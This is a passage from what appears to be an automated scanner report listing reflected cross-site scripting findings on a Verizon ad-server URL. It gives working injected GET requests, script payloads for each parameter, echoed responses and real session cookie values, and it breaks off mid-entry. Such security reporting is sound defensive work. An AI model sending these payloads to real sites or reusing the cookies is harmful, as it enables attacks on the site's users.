Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
tate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.595. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pws parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a25"><script>alert(1)</script>030f87d661d was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.596. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55331"><script>alert(1)</script>3099bd94315 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:58:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315" target="_top">
...[SNIP]...

2.597. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [sec_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a8c"><script>alert(1)</script>afe03052625 was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
y=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.598. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_enh_msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98904"><script>alert(1)</script>6476ec4b36d was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search=" target="_top">
...[SNIP]...

2.599. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_premmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd524"><script>alert(1)</script>db31b89a21 was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.600. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [usertype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c3a7"><script>alert(1)</script>6769bca969e was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
sur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target=
...[SNIP]...

2.601. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vasonly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da1a"><script>alert(1)</script>d0153c69ecc was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.602. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodfamily parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59812"><script>alert(1)</script>b6620b35637 was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
1693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.603. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodunlim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e095"><script>alert(1)</script>1f394cc321d was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.604. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [viss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff424"><script>alert(1)</script>ef31f985b3 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.605. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a690"><script>alert(1)</script>2618c9bf78 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

